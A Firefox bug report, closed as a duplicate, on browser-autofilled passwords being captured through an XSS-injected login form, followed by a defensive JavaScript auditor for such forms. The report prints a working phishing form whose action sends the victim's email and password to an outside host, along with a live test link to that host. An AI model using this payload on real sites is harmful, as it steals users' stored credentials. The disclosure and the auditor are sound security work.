Closed Bug 1312769 Opened 8 years ago Closed 8 years ago

Disclosure of browser password and e-mail for site

Categories

(Firefox :: Untriaged, defect)

49 Branch
defect
Not set
normal

Tracking

()

RESOLVED DUPLICATE of bug 1118511

People

(Reporter: gninrepoli, Unassigned)

Details

Attachments

(3 files)

Attached image 1.JPG
User Agent: Mozilla/5.0 (Windows NT 5.1; rv:49.0) Gecko/20100101 Firefox/49.0
Build ID: 20161019084923

Steps to reproduce:

When you click on the button "Remember" (Look at 2.jpg), your password, email, phone number, etc., will remain in the browser. Suppose you found XSS on the website. You can write the following code:

<form action="http://piwik.netne.net/enter.html" class="t1-form signin" method="get">
  <input id="signin-email" class="text-input email-input" name="session[username_or_email]" autocomplete="username" placeholder="E-mail" type="text">
  <input id="signin-password" class="text-input flex-table-input" name="session[password]" placeholder="Pass" autocomplete="current-password" type="password">
  <button type="submit" class="submit btn primary-btn flex-table-btn js-submit"> Enter </button>
</form>
-----------------------------------------------------------------------------

and steal confidential information that has been stored in the browser if the victim is held by the above-described code page.

Link for testing: http://piwik.netne.net/enter.html

Actual results:

Stole password and e-mail from site.

Expected results:

Like in 1.jpg
Attached image 2.JPG
Attached image 3.jpg
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
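
A site owner can audit pages for the pattern in this report: a form with a password field whose action leaves the page's origin, uses plain HTTP, or submits with GET. The check below is an added example, not part of the bug report or of Firefox; `PAGE_URL` (`site.example`) and the `/sessions` form are constructed for illustration, and the function names are hypothetical.

```javascript
// Added example: flag credential forms whose submission would send
// autofilled values off-origin, over plain HTTP, or inside a URL.

// Constructed sample input. PAGE_URL is a hypothetical hosting page.
const PAGE_URL = "https://site.example/profile";
const reportedForm = { // attributes copied from the form in the report
  action: "http://piwik.netne.net/enter.html",
  method: "get",
  fields: [
    { type: "text", autocomplete: "username" },
    { type: "password", autocomplete: "current-password" },
  ],
};
const sameOriginLogin = { // constructed benign form for comparison
  action: "/sessions",
  method: "post",
  fields: [{ type: "text", autocomplete: "username" },
           { type: "password", autocomplete: "current-password" }],
};

// In a browser, build the same descriptors from the live DOM.
function describeForms(doc) {
  return Array.from(doc.forms, (f) => ({
    action: f.getAttribute("action"),
    method: f.getAttribute("method"),
    fields: Array.from(f.elements, (e) => ({
      type: e.type, autocomplete: e.getAttribute("autocomplete"),
    })),
  }));
}

function auditCredentialForm(form, pageUrl) {
  const findings = [];
  const hasPassword = form.fields.some((f) => f.type === "password" ||
    /(^|\s)(current|new)-password(\s|$)/.test(f.autocomplete || ""));
  if (!hasPassword) return findings; // not a credential form
  const page = new URL(pageUrl);
  const target = new URL(form.action || pageUrl, pageUrl); // resolves relative actions
  if (target.origin !== page.origin) findings.push("cross-origin-action");
  if (target.protocol !== "https:") findings.push("insecure-action");
  // HTML forms default to GET, which puts field values in the query string.
  if ((form.method || "get").toLowerCase() === "get") findings.push("credentials-in-url");
  return findings;
}

function auditPage(forms, pageUrl) {
  return forms.map((f) => ({ action: f.action, findings: auditCredentialForm(f, pageUrl) }))
    .filter((r) => r.findings.length > 0);
}
```

In a browser console, `auditPage(describeForms(document), location.href)` runs the same check against the rendered page, including any markup injected after load.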